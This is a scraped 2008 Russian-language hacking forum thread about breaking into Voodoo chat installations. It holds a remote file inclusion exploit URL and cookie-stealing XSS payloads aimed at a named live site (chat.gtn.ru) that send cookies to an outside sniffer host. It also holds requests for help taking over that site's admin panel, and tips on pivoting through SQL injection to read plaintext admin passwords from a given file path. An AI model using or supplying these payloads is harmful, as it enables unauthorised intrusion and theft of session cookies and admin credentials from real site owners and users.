Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

01.02.2008, 05:42
|
|
Новичок
Регистрация: 14.03.2005
Сообщений: 13
Провел на форуме: 15240
Репутация:
0
|
|
Народ , видал я вот такую багу в Voodoo :
Bug in : index.php
#
#Vlu Code :
#--------------------------------
#//here it can fails, i don't care. will be used default system language
#
# else
include_once($file_path."languages/".$language.".php");
#
#
include($file_path."designes/".$design."/index.php");
#?>
#================================================= ================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script
Path]/index.php?file_path=http://SHELLURL.COM?
только чего-то не выходит . пишет 404 ошибку . Так подскажите то ли я чего не так делаю , то ли пропачена уязвимость датирована она 2006-08-02 . Помогите разобраться
|
|
|

01.02.2008, 12:49
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме: 11338585
Репутация:
441
|
|
Патченная скорее всего версия...или просто другая версия) 
|
|
|

03.02.2008, 13:28
|
|
Новичок
Регистрация: 14.03.2005
Сообщений: 13
Провел на форуме: 15240
Репутация:
0
|
|
А может быть я чего-то недопонимаю , тогда те кто уже юзали сей эксплойт ... объясните на пальцах плиз ...
|
|
|

20.02.2008, 01:04
|
|
Участник форума
Регистрация: 02.01.2007
Сообщений: 202
Провел на форуме: 868377
Репутация:
99
|
|
Народ, помогите пожалуйста с http://chat.gtn.ru
там есть
Код:
http://chat.gtn.ru/go.php?url=javascript:alert(/document.cookie/)
формирую запрос:
Код:
http://chat.gtn.ru/go.php?url=javascript:img%20=%20new%20Image();%20img.src%20=%20"http://s.netsec.ru/schut123.gif?"+document.cookie
но на сниф ничего не приходит.
так-же там есть
Код:
http://chat.gtn.ru//password_reminder.php?look_for=%3Cscript%3Ealert(document.cookie);%3C/script%3E>
формирую запрос:
Код:
http://chat.gtn.ru//password_reminder.php?look_for="><script>img%20=%20new%20Image();%20img.src%20=%20"http://s.netsec.ru/schut123.gif?"+document.cookie;</script>
На снифере никакого эффекта. Пусто.
Подскажите, как быть.. Возможно я неправильно запрос составляю. Или что-то еще..
|
|
|

20.02.2008, 13:06
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме: 11338585
Репутация:
441
|
|
schut123 ты куки не поимешь..ибо в вуду там сессия идёт.......вообщем хсс не катит......
|
|
|

20.02.2008, 14:28
|
|
Участник форума
Регистрация: 02.01.2007
Сообщений: 202
Провел на форуме: 868377
Репутация:
99
|
|
А как тогда можно админку получить? Насколько я понимаю сули там тоже нет...
Помогите найти уязвимости в этом чате, которыми можно реально воспользоваться.
|
|
|

20.02.2008, 14:58
|
|
Banned
Регистрация: 21.07.2007
Сообщений: 504
Провел на форуме: 1899369
Репутация:
445
|
|
Сообщение от schut123
А как тогда можно админку получить? Насколько я понимаю сули там тоже нет...
Помогите найти уязвимости в этом чате, которыми можно реально воспользоваться.
Раньше спичкой разрывал чаты такие. Пихаеш спичку в ENTER и ждёш..
|
|
|

21.02.2008, 01:46
|
|
Участник форума
Регистрация: 02.01.2007
Сообщений: 202
Провел на форуме: 868377
Репутация:
99
|
|
Ну а по делу кто-нибудь скажет что-нибудь?
|
|
|

19.04.2008, 20:57
|
|
Участник форума
Регистрация: 19.05.2006
Сообщений: 181
Провел на форуме: 1180139
Репутация:
78
|
|
По делу нет, а вот что бы такой чат похекать, надо хекать форум, канечно если такой есть, на том же сайте что и чат, БД одна на всех, мне это как то давно подсказали, и именно тогда получилось достать логины и пассы от админок в чате, а форум полет от sql inj.
|
|
|

17.05.2008, 14:15
|
|
Познающий
Регистрация: 30.04.2007
Сообщений: 67
Провел на форуме: 287714
Репутация:
40
|
|
дело говоришь..не только дело не в бд......самый простой спрособ взломать вуду енто найти на бажный форум, или стартовую(обычно стоят дефаил) потом лезишь сюды
/home/****/public_html/chat/admin/admin_users.php а там проль в админку лежит в каком виде ,
<?php $admin_users[0]["nickname"] = "***"; $admin_users[0]["password"] = "****"; ?>
самый простой способ!)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|